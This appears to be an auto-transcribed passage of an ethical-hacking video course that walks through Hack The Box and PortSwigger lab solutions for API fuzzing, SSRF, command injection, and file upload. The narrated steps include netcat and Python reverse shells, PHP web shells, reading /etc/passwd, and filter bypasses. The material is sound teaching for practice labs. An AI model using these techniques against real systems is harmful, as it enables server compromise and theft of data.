ethical hacker and with that we will move into the for Loop okay so the for Loop is going to look a little more daunting and scary but it really isn't once you understand how for loops work so if you're coming from another programming languages for Loops are really simple but in JavaScript they're a little more difficult because JavaScript is the language of the web it's not made to run for Loops in a simple manner like python so if we run a for Loop and we're just going to run a simple counter like we just saw we can say something like four and it's going to ask us do we want to run a for Loop and we're going to say yes and it gives us the boilerplate for a for Loop so we'll just leave this index instead of I and so we're just going to say that I equals 0 and as long as it is less than 100 we're going to go ahead and say I or index in this case plus plus and then we can just console log this and then we'll say index just like this and now if we run this we're going to get an output down here of counting to a specific number so in the world of programming I almost always use for Loops I rarely use while Loops but I just wanted you to see these for loops and while Loops so that you can read them when you're looking through JavaScript code for vulnerabilities I just want to show you how to enumerate apis because this is something that isn't covered in any courses or any certifications that I know of so if you come in to your terminal and you have an API like this and you come in here and you type in like V1 or you're typing in basically anything you're just trying to figure out how do you get further down the line you're looking for endpoints the tool I like to use for API fuzzing is fuff so it looks just like this if I can get here but there we go and I actually ran this just to make sure it was going to work before I did the video so I like to run fluff and then you give it the URL and this is the API and then we're going to be fuzzing for an endpoint and then you give it a word list that you want to use gobuster and derb and a lot of those uh your usual fuzzing tools just don't work with apis so I like fuff because it does work and you run this and you see it pulls down docs and API so if you were to do this like in a live program you'd come in here and you just type in API and then it says we have V1 so you can just type in V1 and then you'll have user and you can kind of see if we wanted to look for more endpoints we could just close out of this and we would just move our fuzzer over so you would just go like this and then it would fuzz right here and it would look for more endpoints over on this point so that's how this fuzzing apis work if you're interested you can go ahead and do the Box hack the box it's actually really simple you just create a username using the API so you'll use burp you'll just intercept the request and it'll send you back a Json of what you need and then you can make turn your request into a post request and make a username and password and login so this is API fuzzing you'll see these on bug Bounty programs and sometimes you'll come across them in hack the Box machines but this is something that's not really covered so I wanted to make a quick video on API fuzzing and uh bug Bounty so sometimes you can find an API an API URL like this and you can just start fuzzing away and see what information you can come back with and manipulating the requests so that is API fuzzing we're going to cover server side request to forgery purpose of this video is to show you what is going on inside of a server-side request a forgery and walk through a couple of examples so maybe you can understand what is happening so the way we're going to go about this is I'm going to show you a flow chart and the flowchart might not make a whole lot of sense in the beginning but I want to show it to you so that way you kind of see what is happening and then we're going to walk through two different examples and then come back to the flowchart and at that point the server side request forgery should make a lot of sense to you and you should be able to start looking for these bugs as you are browsing through programs and you'll be able to submit a proof of concept that makes sense to the person who receives your bug report with that let's jump into it or with a very simple basic flowchart I tried to make it as simple as possible so that you guys could understand exactly what's going on and that it wouldn't be too busy with too much going on so this would be us the user and you could also change this to the hacker or the attacker and so the attacker sends a URL request to the website so we're manipulating the URL and then the website makes this request that you weren't supposed to be able to make to the server and then the server sends the data back to the website and then you can view it as the attacker so this is how the flow works if you were just a regular user we would just have user here and you would send a request and it's just as any request that's going to the website and the website would pull the information from the server and the data would be sent back to the website and you would see the request that the website made to the server the problem with the server side request forgery comes in when you have the ability to manipulate late this URL request so let's say it's the URL wants to reach back to the home or root directory and you're able to grab a file off of the server instead of the actual directory right here so with that we're going to go ahead and move into an example so we are going to be using this example from Love on hack the box I'm not going to walk through all of the Recon and what gets you to this point but rather just what is going on with the URL so in here we have the web application that's going to reach out to the server through this URL form right here and if you're ever doing a CTF or any kind of certification and you see something like this this is a dead giveaway that there is a server side request forgery anytime you see a URL right here but most of the time the URL is going to look like this up here and you're going to have something like this and then it will pass in a parameter like a URL equals and then it'll have a file right here such as the root directory or some kind of file so we could just put in here some file and then what you would do is you would manipulate this right here and you could pull down files a different way but instead of having it right here inside of the URL this web application has it right here and because this is an easy box on hack the box that's probably the reason they put the URL request down here in a submit format instead of being in the URL and you have to deal with it inside of burp so this is how you're normally going to see it it'll be up here in the URL something like this and in the next example we're going to see it's also not going to be up here but it's going to submit a URL request and we'll be able to see it in burp and we'll be able to manipulate it just like we would up here only we're going to do it in burp so inside of this file scanner right here on this hack the box if you ever want to test a server-side request forgery it's pretty simple you can just come over here to a terminal and you can set up a netcat listener on Port 80 and it needs to be on Port 80 because it's going to have to go through the HTTP protocol over here you just type in something like a HTTP or right here this is my VPN with hack the box and so we can hit scan file it's going to hang for a second we can cancel it or you can just come over here and cancel out of this you can see that it reached out to my little netcat listener here on Port 80 and so we know that this is trying to grab a URL and you can check to see if it's grabbing a file from the server by typing in the actual IP address so in this case for this hack the Box the IP address is HTTP slash and it's 10 10 10 239 just like this and if we scan this it's actually going to bring back the web page right here so if we went to this IP address right here we said http and then we said 10 10 10 239 and then we come here you'll see this voting system right here this is also on This Server so I actually had to add this to the Etsy host file and if you're not familiar with that what that is that's okay so because we're able to pull down this voting system by pointing this machine to itself we know that we are able to pull information from the server and I want to show you why this is so bad and it's such a detrimental vulnerability because if I were to come in here and we scanned and we searched through all these files like you would in order to get remote code execution on this box you can grab files off of this server and in the case of this specific box on hack the Box you're able to grab a password file so you would have to go through and scan the network but just to show you we're not going to do that we can grab so this is the localhost and it's on Port 5000 and we can hit scan file I was missing this dot here we can hit scan file and it's going to pull this information from the server and it's going to tell us that you have the credentials for admin right here so this would probably be the admin and then then you have the password right here so this is why server side request forgery so bad is you can pull information that you shouldn't be able to access from the file so we're going to move on to a port swiger right here and they have a basic ssrf against a local server it's going to tell us to solve this lab we're going to change the url axis of the admin interface at this location and we're going to delete this user right here so let's open up the lab and the way we're going to go about solving this is I forgot where it told us this is located I think it said inside of a check the stock feature so if you come over here and we open up burp we can turn actually we need to be in inside here now we can turn intercept on and we can check the stock and we'll send this to repeater and then we can just turn this off okay before we change any of this we're going to send this to repeater so you can see what we get back this is the normal request this is what we get back we get back a response of okay but if we just delete this whole thing right here and we paste in the local host and then we go to the admin and we send this we're going to get back a different page and we're actually told that we've reached the basic SRS ssrf against the local server and I think we're supposed to actually delete the user Carlos right here and so the way we would go about doing this actually before we delete him I want to try something just because I just showed it we can go 127.0.0.1 and this should send us to the Local Host as well see if we get back the same thing and we did so this is what we would do is you can type in localhost right here or 127.0.0.1 and then we're on the admin page now what we need to do is delete the the user Carlos and I'm guessing this is supposed to be done from the admin panel I suppose you could read through here and maybe it might tell us what we can do from the admin panel oh it tells us right here it says we need to delete the user Carlos you can actually just copy this right here look it says we can delete these users actually tells us we can delete a bunch of users and we can paste this in here um we got too many admins going on we can delete that all the way back now if we hit delete this right here should pop up to solved so if we send this it tells us not found I think we have to follow the redirect turn the proxy off and it tells us that we have deleted the user Carlos so this is how a server-side request forgery works and I want to walk you through this one more time so now I want to bring you back to this flowchart right here and now you understand that what we're doing when we we are the user and we make a request through the URL through something like this and let's say we want to get a file you would do this right here and if you were on a Linux machine it would look something like this and you could try and pull down the Etsy pass WD file actually not sure if there's supposed to be a colon there or not so you can Google and check that I can't remember but it would be something like this to pull down the Etsy pass WD file and on Windows you're going to be trying to pull down some kind of Windows system file that would just be on the server to see if you can get files but you wouldn't do this necessarily in a proof of concept what you're going to do is like I showed over here with opening up a netcat listener and then making a request to the URL which is going to be your own IP address right here to see if you get a connection back a quick tip to see if you're trying to figure out what the server is if it's Linux or Windows and you want to know what kind of file to look for you can actually just ping the server and see the hack the box is a Windows server and it's 239 whenever you see this TTL of a 127 or 128 or something in the 120s it's going to be a Windows server and when you pay a Linux server it's going to be somewhere in like the 65 range and that's one way to tell what kind of server you're going up against you can just really simply ping it or you can run it in map scan and it will tell you but this is server side request forgery in a nutshell you're going to make a you're the user and you make a request through the URL to the website and then the website request the URL from the server and the server sends the data back to the website and then you're able to view it as the user and if you are able to manipulate the URL request to the server you can grab files from the server that you shouldn't be able to access okay so before we move on from server side request forgery I really wanted to show you one more thing that you might come up against in the future so we're here on Forge from hack the box and you have this upload from URL and I'm not entirely sure how it's going out and grabbing the URL or an image from the URL because this is apparently a gallery website and you can post images to the website so we can we have upload an image you can upload through the browse like like this or you can upload from a URL so I imagine it's doing some kind of wget or something like that and we know that we are on a Linux box so you can try and do some stuff here we'll just ping it real quick so if we ping the IP address you can see the TTL is 63 so that tells us we are on a Linux box and so if you wanted to you could do something like a file slash slash and then we would go Etsy pass WD and we can try and pull this down and it tells us that we're not allowed to do this so we're on a Linux box we're not allowed to grab files directly from the server this way so I'm going to put this in burp and we'll play with it in there so we can and we know that the URL is working because if we come out here and we set out and we set up our netcat listener like we have been doing and we put in our IP address which I have up here which is 10 10 14 6 just like this and when you hit that it's hanging and we see it reach out to our box right here we can close out of that so we know the URL is working now we just need to figure out how to get the ssrf to work so we can come back over here we'll put this in burp and then we'll play with it so we'll just put and some we'll just put in our own IP address right here we'll turn intercept on and we'll submit this we can send this to repeater we can turn that off and it's going to give an error because it's there's nothing for it to connect to but that is okay so over here in repeater we have this right here and if you remember to on URL encode it is a control shift U if you are on a Mac not sure what it is if you are on a Windows box so there's a couple of different ways to get this ssrf to work and I actually want to try something real quick that I have not tried on this box before I want to see if the if we can bypass the filter by going file slash slash Etsy pass WD and I believe this actually needs three right here to work and so what you see we did here is we saw that it didn't work with just Etsy password but it might just have a filter on the box and if we change some of the casing it may work for us and it tells us we have an invalid protocol so it has to be in HTTP or an HTTP request so we're not able to just pull down a file because it's requiring HTTP in order to be in the request we're not going to try and grab the Etsy pass WD file so what we're going to do now is just try and make a request back to the server and get it to work so in a bug Bounty world if you come across something like this and you're just trying to prove that you can reach back to the server with a request what we're going to do is just try and query the server and see if we can get this to tell us something other than an invalid protocol so if we come in here and we go to the actual URL which we have right here which would be forge.htb and we send this we get told it is blacklisted so you're not able to go to the actual URL right here but if you do like we tried with the file pass with the Etsy pass WD file you can just come in here and type in Forge and you can just change a few of these characters and now if you send it it tells us we have reached back to the server and we are not getting a blacklisted message any longer so this is one way to try and bypass like a blacklist or something on a server and if you come in here and you do a 127.0.0.1 and you send this like we were doing earlier it is blacklisted but the actual IP address so if you wanted to get the IP address of this right here it tells us that this right here is blacklisted but if we actually wanted to get the IP address let's say we're on like Yahoo or something and we want to know the actual IP address of what we have going on right here burple actually tell us what the IP address is really easy you can just come over to your proxy and turn your proxy on and for that and we can come to our URL upload you can just type something in here doesn't matter what it is submit it and when you hit this it'll tell us like the request is being sent to forge.htb but the IP address is 10 10 11 11 and we don't really need that request so what you can do since this is blacklisted and this is blacklisted you can just try the actual IP address to the server and in this case it looks like this and you can send it and you can see that it went through so the IP address ironically is not blacklisted I'm not sure if hack the Box meant for that to work or not but it worked so you can actually try several different ways to get past the Blacklist within a server-side request forgery and this is a few different ways to do that okay so I think we're going to go ahead and pause on ssrf at this point if you have any questions on server-side request 4G and you'd like to see something in more detail please let me know down in the comments but in the world of bug Bounty this would be plenty to get you by however if you're going to be a penetration tester you're probably going to have to dive into ssrf in a little deeper context that way you learn how to take a server-side request forgery and turn it into remote code execution but I think that is out of scope of this video so we're gonna go ahead and pause this here and if you would like to see more server-side request forgery in the future and how to turn this into to remote code execution please let me know and I'll get to that all right before we close out this section here on the server-side request forgery I thought I would pull up the activity and I was reading through some of these recently and you can just see look at how high the impact is for server side request forgery and I was reading through how some of these were done and this one right here was really cool and I thought I would show you how this actually works and I and so I went and read through this and I actually did learn a little bit about the exploit and it was pretty cool and I came back to the portswiger labs and was playing around and I found out something I did not know before so if you come in here where this server side request forgery is and you remember it's right here inside this stock API we can send this over to repeater and if we do the unurl encode it we have this right here and we can see what's being sent but we'll go ahead and put that back but what you can do that I didn't realize we were able to do is you can just add in another parameter if we were like breaking this right here and it wasn't working we can just come come in here put the and side and type in a stock API equals and then we could just do the Local Host and then we can go slash admin because we're supposed to pull down the slash admin panel and we can send that and we need http slash slash and it works for us and it pulls down the information we needed in order to delete the user Carlos so I didn't know beforehand that we can just add in new parameters right here and so I thought this was something that was really cool that you can add in extra parameters in here in addition to the one that's already there so you don't actually have to delete this first one you can just pull down and pull down a second one and then also reading it through the hactivity I noticed I think what we'll do is just delete this first one so the way it looks nicer so you can see it and so we'll send this and we don't get quite as big of a page back when you're doing something like searching for an ssrf if I noticed a few of the activities were they had hit a line like this that's accepting in a parameter or even appear in the URL and what they just started doing was they would say and URL equals and then they'd put in 127. 1 and then and then you could just leave it like that and they were sending this and it would be easier to test for this if you had it in repeater so we can grab this send it to repeater not sequencer send this over turn that off and then if you send this you'll see it doesn't actually pull anything back for us and you can search for the word delete over here as if we're going to delete the user and there is nothing but you could search you can but you can try this URL you can try URLs and send that to see if this is a parameter that will actually reach out to the server usually it's going to be saved as a URLs or a URL something like this and this is not vulnerable this actual lab is not vulnerable with the URL parameter because the URL parameter is not the one that's making the request out to the server but you could very easily change this with a change request message change the request method and then delete this and just add in the stock a API just like this and this should work I think we have to make it so it says it needs to go to the admin panel uh it needed this up your products and then in the stock directory and then and I forgot HTTP slash so basically this is just remaking this request over here but this should work now and it does so you can play around with these when you're in a live program and see if you can find a parameter that actually does hit the URL so if you come over here and you open up this and you're reading through it what's really interesting inside of this guy's explanation is there was actually a notification that says this right here is reaching out to the URL parameter which just pretty much tells you that it's going to be vulnerable to a server-side request forgery and when he tested it right here it works now this guy had to do a little more to it and I don't want to read all this to you so you can come out here and read it but he had to do a little bit more in order to get this to work through a token I believe it was but it was a pretty cool server side request forgery and you can come over to the hactivity now that you understand how server side request forgery works and you can read through some of these and see if you can learn additional ways to pull off a server-side request to forgery so with that I'll see you in the next vulnerability all right welcome to the section on a command injection this is probably going to be one of the most severe vulnerabilities that you will ever come across this vulnerability gives you the opportunity to execute commands on the server and get information back and possibly even get a shell on the server so this is one of the most severe vulnerabilities that you will probably come across because you can just compromise the server and all of the information on it and if you're in a penetration test then you can try and move around within the network so let's go ahead and dive into command injection okay we are going to be talking a little bit about command injection and there's not really a whole lot of places to practice command ejection that I know of really it's just try hack me and then Port swiger which we'll come to here in a little bit in practice on so with command injection what we are able to do is put commands into the server and then it tell us back it'll give us the information back for whatever we sent the command in for so if we send a who am I command it will tell us who we're running as on the server and so it says here a command injection vulnerability is also known as remote code execution because an attacker can trick the application into executing a series of payloads payloads that they provide without direct access to the machine so this might sound a little confusing but it's going to make a lot of sense here in just a second and so their example here is the who am I command and I'm going to go ahead and launch this box and then once it is loaded I will bring you back okay so this is now loaded up and ready for us to practice some command injection but before we do I want to show you kind of what is happening if we come over to a terminal here and the first thing I want to do is copy this to make sure we know what kind of commands to send through to the server but really you could just put in an I uh who am I and you could probably figure it out by that but we can also type in ping and then the IP address that we just copied and then you can hit enter and we see that the TTL is so 61 so we know that this is going to be a Linux server that we are up against so now it tells us to use this handy web application to test the availability of a device by entering its IP address and it's just going to go out and reach to an IP address so a way to test this is to see if we wanted to check our device we could come over here and set this up and my IP address is up here so we could say 10 to 42 96 and execute and see if we can get it to reach out and it's in a ping out to our box and it did not connect but it pinged our box so this is just sending a ping it's not actually trying to connect so what we can do with this now is you can just type in 127 .0.1 and you can execute it and it's going to tell us it's going to give us back another ping of the box and I guess I didn't need to Ping it because it tells us right here it's going to be a Linux box so some of the things we can do I actually played around with this that's why you can see these in here I wanted to see all the different commands that it actually let me send so I wasn't just sitting here testing everything for the first time so here's a couple of the command injections that you're going to need to know if you come in here and we type in 127.0.1 you can do an and sign like this um .0.0.1 we can put in an and sign just like this and then we can do a who am I and it'll execute and you can see that it says we are ww data but we still get this ping right here and it is possible in the coming lessons that we're gonna we just don't want to see all this ping right here so what you can actually do is just put in a bunch of mumbo jumbo and then you can use a double pipe and do the Hewitt who and then do the who am I and it skips the Ping and we get the WW data but if we run this Command right here and we don't double pipe it you only do one pipe oh it still works okay I was going to say that it doesn't work but it worked for us so we still get the W the www data so sometimes it won't work with one pipe and you'll want to send through two pipes and then sometimes you'll also have to have like a pipe afterwards and run it and that time it doesn't work for us so you will in the wild just have to play around with this so we get the who am I and it tells us where www data and you can type in ID and see how we're we're sending commands through so if we come back over here and I type in ID you can see we get this back so we're actually communicating with the server and this would be a very very bad thing in the real world so there's one more thing I wanted to show you and that is this ping right here if you were doing a blind command injection and you were and you wanted to know if you could reach the server but you weren't getting any information back you could run the regular whatever's up here sometimes it's not it's not going to be something like this you're not going to be pinging a server it'll usually be a parameter with an equal sign and then you put a command in over here but you can ping in the dash C with the 10 is going to tell it to delay 10 seconds so we'll actually put in five seconds so we don't have to wait quite so long and it's going to Ping itself so if you watch down here we have the seconds and we'll hit it when it hits 10 seconds and wait for it and see if it comes back in five seconds if so then that works and it did so we pinged it and that's how you do a time delay which we're going to see in just a little bit you can also run these with this and sign right here there will be times that you'll need to try this and you can actually if you're getting stuck on command injection what you can do is go out to Google and just type in command injection bypass and just look for different Windows command injection bypass maybe you'll have to do some URL encoding or something of that nature and you can just bypass whatever filters they have so you can also do with this you can do two two and signs just like this and it should still work for us and we'll send that over and see if it takes five seconds and it comes back and then I want to try one more thing I actually have not tried this yet but because this didn't reach back on our neck cat I want to try this again we'll set up a netcat listener and we're going to set it up on Port 4000. and see if we can actually get this to connect back to us so if we do this right here we can do our pipe we'll actually do a double pipe and then hopefully we have netcat available and we can type in our IP address for it to connect back to so 10 to 42 96 and then Dash e and then we'll go and Bash and then we can execute this and see if it reaches back it doesn't look like it's going to because I did not type in the port so we'll highlight this we need to put a port in here and I think I did four thousand execute it was Port 4000 and it did not reach out so maybe this doesn't work we'll try one more time and then we'll move on and I want to show you one other thing you can try with this so netcat doesn't work didn't reach out to us so one thing you can also do in this command injection like if you were going to capture the flag one thing I would do as I would come in here and I would type which Python and see if we could get a python reverse shell and we can close out of that and let's do something like this so we can get just what we want back and we don't have any output let's see so this this box might not let us get a reverse shell on it so I guess we're not gonna be able to figure out what kind of Python's on here but this would be command injection in a nutshell and I'm guessing we just oh we have python3 so we could try to get a reverse shell with python so you could come to Google and we would type in Python reverse shell we can try pin test monkey and we could try this right here so we can set up our netcat listener we'll go Port 444 and we can type something in here we got Ben I want bin Bash what do we have over here and it's possible that this won't work either and I would suggest typing something out like this in a text editor save some time 0.96 and make sure this says we need Python 3 execute and we get a shell back over here so now if we say who am I we are on the box and if we type in ID it'll tell us who we are so you can get a reverse shell this way rather than just be sitting over here with command injection and sorry I kind of fumbled around there I actually didn't try that before we did this little video here so this is command injection in a nutshell this is a great place to practice so if you have a subscription to try hack me this is a really good place to come over here and practice your command injection but if you don't there's also a free way to practice command injection and we're going to practice it here in just a second on a port swiger so let's go ahead and I'm gonna get things set up and we will start command injection over here in portswiger if you would like to go ahead and open up portswiger and get this set up so you can follow along or try them on your own then you can do that okay so here we are at portswiger and we are on the OS command and injection we're going to do these first three right here because they're pretty easy and I believe you had to have burp Pro for this and so we're not going to do these ones down here but the first three of these are actually pretty easy and you should be able to I think solve them I think you probably could solve all three on your own but for sure you should be able to solve these first two so we'll go ahead and open this up and it tells us this lab contains an OS command injection vulnerability and the product ID Checker the application executes the shell containing the user supplied product store ID so we've seen stuff like this in the past so we'll access this lab and it tells us we are not solved because we haven't done anything so when we have finished this this should say solved up here so we can see what burp is doing it's doing nothing it's not hooked up so down here in the check stock like we've been doing and following the instructions right here in the product stock checker we can forward that we're going to check stock forward and right here is what we need send that to repeater we can turn that off and now we have the product ID and the store ID and this is going to be where the command injection is at so if you would like to try and solve this command injection by yourself I would go ahead and give you this challenge we have found the location and I think you can figure it out it's right here you should try and see if you can figure out some of the command injection commands that you just saw previously and give it a shot but if not here we go so we have this a product ID right here of one and what we were doing in some of the last ones was we were able to put this and sign in here but because of the location of the command ejection in this post request we're not going to be able to use those we will have to use a pipe and so you can type in a pipe right here and do something like a who am I and we can send this and see what happens and it tells us who we are so that's probably right there solved this for us and it did but while we're here let's play around with this let's see what happens if we do two pipes and we send this uh it does nothing what happens if we do two pipes at the end and send it nothing comes back what happens if we just do one and one and this is just something that I would encourage you to do as you find Acro you come across things like this so we actually have it come back with a pipe at the end in the beginning what happens if we change this to very clearly a product ID we don't have and it still works what happens if the product ID is wrong and we have two pipes and we send it nothing now what about this store ID right here what if we tried two pipes and we go who am I it gives us a syntax error what about two pipes and we send it gives us the same thing we can come over here and maybe we can say an ID it tells us who we are and so you can really just play around with this and see what happens what if we put a crazy ID number in here it still works and then you can just mess around with this and see what works and what doesn't if we check out who am I syntax error we could go which python like we did before and this is black because it needs to be URL encoded which is a plus sign and we don't get anything back and I don't think that you're able to get remote code execution on this so here we go this would be your command injection right here we're going to try and do another one on this on this lab right here so if you would like to go ahead and open this up and read the instructions then I would say go ahead and see if you can figure this out I'm not going to read it just yet I want you to go ahead and read this and try and figure it out on your own and if you get stuck then we'll go over it okay so this says the lab contains a blind OS injection so if you're familiar with the bug Bounty for beginners of course that I already have out then we know that a blind injection means we're going to have to do some kind of time delay and it's not going to tell us what's in the response so we have a 10 second delay in order to solve this Challenge and it tells us that the vulnerability is in the feedback function so with this you can go ahead and open up the lab and we have this submit feedback right here and we can just type in a bunch of gibberish and I think this is going to ask for some kind of ending for an email account and we can come back and intercept this send it we'll send this to repeater and it is possible that this took you much much longer to figure out because we have a bunch of different parameters in here that we are testing again so we have the name right here so in a time delay we saw this in the try hack me example that I I showed you you're going to try and do a ping against the server itself and wait for the time delay so what we would do in a time delay command injection or a blind command injection with a time delay you will type in ping and then we have to URL encode it and it will look just like we did previously I'm going to do five seconds to start out so we don't have to wait 27.0.0.1 and then if we send this we'll see right here this should be like four or five thousand when it actually works so we can try a pipe at the beginning pipe at the end we can try another pipe and I see that I made a mistake I didn't have the one in there so we'll try this again and say go still not long enough we can add in another one and see if this works and it doesn't seem like this is going to be our spot otherwise one of these would work we can't use the and sign in there so we'll just move on to the next one we'll say pipe ping and I have this I fast forwarded typing this in so you don't have to watch it again so we got our pipe and our ping command we can send this we'll turn this proxy off it's bothering me that it's flashing we can see that the time did not work so we can throw a pipe on the end send it not long enough let's try two pipes and we can send it and our time is much longer and we can see that it was almost five seconds so now to solve this I believe we can type in a 10 right here and send it and this should give us the solve because the five seconds was pretty close so it's not solved and it just came back and it tells us that it has solved so this is a timed command injection or a blind command injection this is how you test it with a ping against the server itself and give it a time delay so with that we're going to move into the last one of our Command injection labs this one is going to be a lot harder I think you can figure it out if you've done the my bug Bounty course and you've also gone through my free ethical hacking course because the ethical hacking course is going to cover things that are kind of like this when you get into the actual penetration testing portion of that course so if you've gone through both of those I think you can solve this if not and you're pretty new you're probably gonna struggle with this one but we'll go ahead and solve it anyway so we'll open up the lab in a new window and then we'll read what it says so it has a vulnerability that is blind in the feedback function just like we had before the output is not returned in the response like before however you can use the output redirect to capture the output from the command and it says that we have a writable folder and then it tells us to solve the lab we need to execute a who am I command and retrieve the output so what we're going to end up having to do is send a who am I command to the server and then we're going to have to save it in a file inside of this images directory so it's going to be VAR www images and then the file with an output so if you went through the ethical hacking course I think you can solve this if not we'll go ahead and solve it together now so I just had an idea if you want to try this on your own I can actually show you over here we can make a directory and we'll call it test we'll CD into test CD to test and then what we can do is if I type in who am I I can send this command and I can put it in a file.txt and now if I hit enter and then we Capital LS you can see this files here and I cut out file.txt it tells us that we are Cali or if i g at G edit this file it'll save the response in there so we're basically going to be doing this right here inside of this directory right here so what we're going to do is give a who am I like like we did up here only it's going to be in this right here and so your command is going to look like this and if it has to be URL encoded you'll need plus signs right here um if not you can just you might be able just to delete this and do it with no space and then you're going to need to try and retrieve the file with the command injection and I want to see if you can figure this out so go ahead and give it a try now that I have given you a hint with this clue right here okay so let's go ahead and solve this challenge it said it was in the feedback so we'll come back to the proxy we can come to submit feedback we'll do the same thing we did before and just type in some mumbo jumbo gmail.com [Music] and turn our proxy on submit feedback send this to repeater turn the pro turn the proxy off and so here we are at the same page we were at I'm actually going to make sure that this is in the exact same the command injection is in the exact same place so we don't spend a bunch of time trying to send this somewhere that it's not so we'll go ping so I wrote The Ping command out so you didn't have to watch it I sent it and we'll see it was a five second delay so the command is the command injection is in the same place so we should be able to come in here and say who am I and then we'll give our carrot and then we'll give it the location that we were supposed to give it right here paste that in and then we'll say file Dot txt and send this and hope that it worked and now I think the way to check this is going to be we'll need I think it'll be file and then we'll want to read this file Dot txt so we'll send this okay since this right here isn't working we're going to just go ahead and assume that this is not going to be in the right directory so what we can do with this right here is we know we had to ascend it into the VAR www and I think it was images and then it was our output.text which is where we and then it was our file.text which is where we put our Command who am I right that's what it says we do yes it's in the images so what we're going to probably have to do at this point is find the images because we're not able to pull anything from here so what we'll do is go to the home page and see if we can pull an image somewhere around here see we have the products we have the product ID we have the image okay so we right click the image and hit open image a new tab and we have the image and now we have a file name I bet we can do this without burp and then if we can't we'll open it up and burp so we'll type in file.txt which is where we put the file and it tells us who we are as the user so that's one way to solve this challenge it was a lot more this one was a lot more difficult of a command injection in the real world you wouldn't do anything like this the only time you're going to do something like this isn't a CTF or if you were on a live pin test in the real world in a bug Bounty what you would do is probably just send a ping with a time delay and then submit that and you would stop right there but because this is a CTF it wanted us to grab this user right here and this is where we did it we saved it in images and we needed the file name and the file.txt so that is the last of the command injection that we're going to be covering and we'll move on to the next vulnerability all right in this portion of the course we're going to be covering file upload this can be a severe vulnerability especially if the file is placed somewhere that you can execute what you have uploaded and get back a shell on the server so file upload is one that you're going to see a lot in ctfs they do happen in bug binding programs you can go and read on the activity about some file uploads but in the world of bug bounty hunting most of the time they're probably not going to lead back to a shell but in the world of penetration testing and ctfs or if you're going for any kind of certification to become a penetration tester then file uploads are always a good place to look and make sure when you're uploading a file to see if you can bypass any of the filters that may be keeping you from uploading a specific file with a payload inside of it so with that let's go ahead and jump into it to the file upload so we're going to be going through a if you hack the Box file uploads and the reason we're going to be doing hack the box is there really is no great place to practice file upload and hack the Box really has the best systems to practice file upload if you have a hack the box subscription then you can open these up you can play around with them yourself and actually test these out if not in the world of bug Bounty if you go to the hactivity you can read about file uploads happening all over the place so file uploads do happen we're going to start really basic and then we're gonna have to go through bypassing different filters within the file upload so this one is really one of the easiest and if you want to this box is called October with hack the box and its IP address is right here and I'm not going to show you how I got to this spot because really we're just we just want to see the file upload in action and what happens and why this would be a really huge vulnerability in the penetration testing world so the first thing we're going to do is we can click this file upload and I tested it you can upload a file right here and so what we're going to do is we can just click the file upload button and I'm going to show you two different ways to go about uploading files and testing this out so the first is with a web shell and what we can do is we can come over here like we did before and what we can do is we can go to Google and just look for web shells and I can just show you right here I just typed in webshell and I scroll down until I came to the shushan 747 clicked on it and we're brought to some PHP webshells this one right here is one of my favorites it's the one I use the most and we can just say that we want to create a g edit and we'll call it web.cmd and sometimes you might have to name this like PHP if that's what this server is running in order to get a web shell to run but we're going to run with CMD and we'll test this out we may have to change that to PHP I'm not really sure and so we can come back over here we can upload our web shell just like this and if we go to the URL this is a good sign that it didn't give us an error now we have to pass in a parameter because we have this right here it's going to call our web show when we pass in the parameter CMD so we can come over here go question mark CMD equals and now we should be able to type in a command here and if our web shell works we will receive an output on the page so we can type in who am I and run it and this doesn't seem to work so we will rename this we'll just go move so we will type in our web shell and we will just move it from webcmd to web php5 and the reason I went with php5 is because right here I should have saw this the first time it says php5 so we can save this and now we can upload and we'll re-upload our web shell just like this and now we can click on it click here move that out of the way and we can put our parameter in here so we want a CMD who am I and now it tells us we are ww data and you can use this right here to try and get a reverse shell back over here but I think what we will do is we would just use the pin test monkey PHP reverse cell so we'll just say PHP reverse shell and it should be the first one and so what you can do is go to Raw command a command C we will come over here and we will just say G edit and then we'll call it shell Dot php5 we can paste this in and then we'll need to change our Port because we're listening on Port 444 and over here we are listening on 10 my IP address is 10 10 14.6 we can save this come back over here we could probably close that out we'll upload this file we want our shell open and then we click this right here it hangs which means we probably have got our callback over here and we now have a shell on our box so I want to explain what is happening now that you've seen this the way a file upload works if you upload a file you have to make sure that you know where the actual file is being stored because when we upload our malicious code if you can't execute it on the server it does you no good so let's say you can upload some kind of shell like this web shell right here or right here but you can't find the location on the server of this web shell to execute it it does you no good so you have to be able to locate it and for us this is a really really simple file upload you just click here and it takes you to the location right here of where our file is that we uploaded so these this is a really simple file upload and we have this right here tells us it's running PHP sometimes it'll just say like we'll have a a back end it'll say something like backend.php like this and then you'll know it's running PhD or if it's Windows you may try aspx or ASP and so you're just going to have to get familiar with the systems you're going up against and what you see on the particular on the server that you're attacking but this is a really basic introduction into a file upload we're going to do a couple more that are going to be a little more challenging which is also going to be a lot more realistic in the real world the chances you just come across something that just says file upload and a bug Bounty is almost zero maybe on a penetration test it might happen but in the world of bug mounting probably not going to happen you're going to have to bypass some sort of filters and we're going to do some pretty simple filter bypassing in the next file upload all right we are here on the box popcorn same thing I'm not going to show you how to get here because we're just covering file upload and in this one we're going to talk a little more about bypassing different filters so if we come in here we have this edit right here and it tells us we can update the screenshot which is going to be this image right here and it tells us it allows a JPEG or a PNG and I've never tried jpeg so we might try that just on the Fly and see what happens but we can save this right here we can go save image As and we're in our test file right here or test directory so we'll save that and if we come over here to update the screen the screenshot we will need to browse click on our little PNG right here update it and submit and it tells us that it worked the type was a PNG and now we should be able to come over to the uploads we can type in 10 10 10 6 and we'll go slash torrent and then we want the upload just like this and it tells us here is the image that we just uploaded so that works so what we will want to do now let's see if we can upload some kind of shell so we'll just use one of our PHP shells that we already have in this directory and we'll browse and we can just try this shell.php5 and if we open this and we submit it it tells us we have an invalid file let's come over here and we will move our shell Dot php5 and we'll just call it shell dot PHP and we can try this and it says invalid file now what we can try and do is intercept the request and see what the difference is between these so if we come to update this and we want to update this image again and we upload it and now we turn our intercept on and we submit this we can look at the difference and we'll send this to repeater just to save it and we know that this is going to go through tells us that it worked now we'll come back and upload our PHP shell and see what the difference is so we can come over we'll try our web shell this time and turn on our interceptor send it we'll send that to repeater and we can turn this off now and we can come over to repeater and look at these and see what the difference is so when you come over here and you look at this right here's what we're looking at so we have a content type of image PNG the file name which was the link that we downloaded and then it tells us it's a PNG file and we have all this mumbo jumbo right here and so what we can do is just copy some of this and we can copy and now we can come over here and we have a file type of web.php and then we have our little web shell that we used before and we could just paste this in up above and so our content type has now changed and we have these bytes to try and confuse it and then we have this image or we have our web shell right here so I want to show you a little bit of how a server would read this file type if we come in here and we just say G edit and we want to make a file Dot we'll make a file.gift and we'll see what happens and we'll just put in some letters and we save this we close it and we go 